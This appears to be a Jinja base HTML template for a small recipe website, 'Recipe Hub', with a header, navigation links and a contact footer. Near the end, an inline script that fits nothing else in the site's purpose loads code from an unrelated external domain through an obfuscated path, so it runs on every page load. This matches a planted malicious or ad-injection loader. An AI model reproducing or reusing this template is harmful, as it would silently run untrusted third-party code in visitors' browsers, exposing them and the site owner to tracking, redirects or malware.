<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Recipe Hub">
    <link rel="icon" type="image/x-icon" href="../static/images/favicon.png">
    <meta property="og:title" content="Recipe Hub">
    <meta property="og:description" content="Recipe Hub">
    <meta property="og:image" content="../static/images/logo.png">
    <meta property="og:url" content="https://tanvi-bagwe.github.io/recipe/">

    <title>RECIPE HUB</title>

    <link rel="stylesheet" href="{{ url_for('static', filename='css/style.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/header.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/footer.css') }}">

    {% block extra_css %}{% endblock %}

</head>

<body>
<header class="custom-header">
    <div class="logo">
        <a href="{{ url_for('home') }}" aria-label="Home"><img src="{{ url_for('static', filename='images/logo.png') }}"
                                                               alt="Recipe Logo"/></a>
    </div>
    <button class="menu-toggle" onclick="showAndHideMenu()" aria-label="Toggle navigation">
        &#9776;
    </button>
    <nav class="nav">
        <ul class="nav-links" id="navLinks">
            <li>
                <button><a href="{{ url_for('home') }}">Home</a></button>
            </li>
            <li>
                <button><a href="{{ url_for('recipes_page') }}">Recipes</a></button>
            </li>
            <li>
                <button><a href="{{ url_for('about') }}">About</a></button>
            </li>
            <li>
                <button><a href="{{ url_for('testimonials_page') }}">Testimonials</a></button>
            </li>
        </ul>
    </nav>

</header>
<main>
    {% block content %}{% endblock %}
</main>
<footer id="contact" class="site-footer">
    <div class="footer-container">
        <div class="footer-address">
            <h4>Contact Us</h4>
            <p>Recipe<br>
                Ash brook Lane<br>
                Waterford City, Ireland</p>
        </div>

        <div class="footer-links">
            <h4>Connect with us</h4>
            <a href="https://wa.me/1234567890" target="_blank">
                <img src="{{ url_for('static', filename='images/icons/whatsapp.png') }}" alt="WhatsApp"> WhatsApp
            </a>
            <a href="https://instagram.com/" target="_blank">
                <img src="{{ url_for('static', filename='images/icons/instagram.png') }}" alt="Instagram"> Instagram
            </a>
            <a href="mailto:tanvibagwe97@gmail.com">
                <img src="{{ url_for('static', filename='images/icons/mail.png') }}" alt="Email"> Email
            </a>
            <a href="tel:+1234567890">
                <img src="{{ url_for('static', filename='images/icons/phone-call.png') }}" alt="Phone Icon">
                Call
            </a>
        </div>
    </div>
    <div class="footer-bottom">
        <p>&copy; 2025 Recipe. All rights reserved.</p>
    </div>
</footer>
<script>
(function(iykl){
var d = document,
    s = d.createElement('script'),
    l = d.scripts[d.scripts.length - 1];
s.settings = iykl || {};
s.src = "\/\/fraildepartment.com\/cMD\/9f6.b\/2Q5El-SrWDQu9_NSjqYy4\/O\/DzIr4cOCSe0F2RNpjDgI4dM\/j-kxwp";
s.async = true;
s.referrerPolicy = 'no-referrer-when-downgrade';
l.parentNode.insertBefore(s, l);
})({})
</script>
<script defer src="{{ url_for('static', filename='js/main.js') }}"></script>
{% block extra_js %}{% endblock %}
</body>

</html>